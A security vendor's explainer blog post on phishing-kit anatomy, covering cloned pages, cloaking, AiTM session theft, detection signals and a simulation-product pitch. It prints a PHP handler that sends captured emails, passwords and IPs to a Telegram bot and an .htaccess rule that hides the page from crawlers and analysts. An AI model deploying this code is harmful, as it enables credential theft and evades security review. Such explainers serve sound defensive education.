Anatomy of a modern phishing kit
A "phishing kit" is the packaged, reusable codebase attackers deploy to clone a login page, harvest credentials and exfiltrate them. Understanding how these kits are built — and how they hide — makes it far easier to detect campaigns early and to build convincing defensive simulations.
What ships inside a kit
A typical kit is a ZIP archive dropped onto a compromised host or cheap hosting. Its structure is remarkably consistent:
kit/
├── index.php # the cloned landing page
├── login.php # form handler: captures + forwards credentials
├── assets/ # pixel-perfect copies of CSS, JS, logos, fonts
├── config.php # exfil target (email, Telegram bot, remote URL)
├── antibots.php # blocklists for crawlers, sandboxes, researchers
└── .htaccess # rewrites, geo/IP filtering, hotlink protection
Modern kits are increasingly sold "as a service" (PhaaS — Phishing-as-a-Service), complete with subscription dashboards, updates and support.
The clone
The landing page is usually a byte-for-byte copy of a real login screen, captured with a site ripper or a headless browser. Two tells are common:
- Absolute asset URLs still pointing at the legitimate CDN (so the page loads real logos while the form posts to the attacker).
- A
<form>whoseactiontargets a local PHP handler instead of the brand's real endpoint.
Advanced kits proxy the real site in real time (an adversary-in-the-middle setup with tools like Evilginx), relaying the victim's input to the genuine server and stealing the resulting session cookie — which defeats most MFA.
Anti-analysis layer
The antibots component is what keeps a kit alive. It filters visitors before serving the phishing page:
- User-agent and ASN filtering — blocks known crawlers and the IP ranges of Google, Microsoft, security vendors and cloud sandboxes.
- Referer and geo checks — only serves the page to targets from the expected country, redirecting everyone else to the legitimate site.
- Rate limiting and one-time links — a token in the URL that burns after a single visit, so a forwarded sample renders a harmless 404.
# .htaccess excerpt
RewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot|curl|python) [NC]
RewriteRule .* https://real-brand.example/ [R=302,L]
This is why a URL that "looks dead" to a SOC analyst was fully live for the victim minutes earlier.
Credential capture and exfiltration
The handler validates just enough to look real, then ships the data. Exfil channels, in rough order of popularity:
- SMTP / mail() to a hardcoded inbox.
- Telegram Bot API — a
sendMessagecall to a bot token, cheap and resilient. - POST to a C2 URL or a Discord webhook.
- Local log file the operator scrapes later.
$msg = "u={$_POST['email']}&p={$_POST['pass']}&ip={$_SERVER['REMOTE_ADDR']}";
file_get_contents("https://api.telegram.org/bot$TOKEN/sendMessage?chat_id=$ID&text=".urlencode($msg));
header("Location: https://real-brand.example/error");
Note the final redirect: after "login fails," the victim lands on the real site, assumes a typo, logs in successfully, and never suspects a thing.
Hosting and delivery
Kits favor disposable infrastructure: compromised WordPress sites, open redirects on trusted domains, newly registered look-alike domains, and increasingly legitimate services (Cloudflare Workers, IPFS, SharePoint, Google Docs) to borrow their reputation. Delivery pairs the kit with a lure — an invoice, an MFA "re-verification," a shared-document notification.
Defensive detection
Signals worth hunting for:
- Newly registered domains resembling your brand (monitor CT logs and typosquats).
- Favicon and DOM hashing — kits reuse the exact assets of the cloned brand.
- Outbound Telegram / webhook calls from web hosts that have no business making them.
- Credential submission to unexpected origins in browser telemetry.
- DMARC aggregate reports revealing spoofing attempts against your domain.
The uncomfortable truth: a well-built AiTM kit defeats SMS and app-based MFA by stealing the session token. Phishing-resistant methods — FIDO2 / passkeys — are the durable fix.
How GottaPhish helps
Modern phishing kits weaponize pixel-perfect clones and AiTM session theft that even defeat SMS and app-based MFA. GottaPhish and its expert support team help you meet exactly that threat: safe, fully audited simulations mirroring real kits — tokenized links, credential-capture flows, AiTM scenarios — with dashboards showing which lures land and where MFA holds. Our experts assist with setup, design scenarios that reproduce current PhaaS tradecraft, and help you interpret the results as targeted training and concrete detection-engineering signals for your SOC.
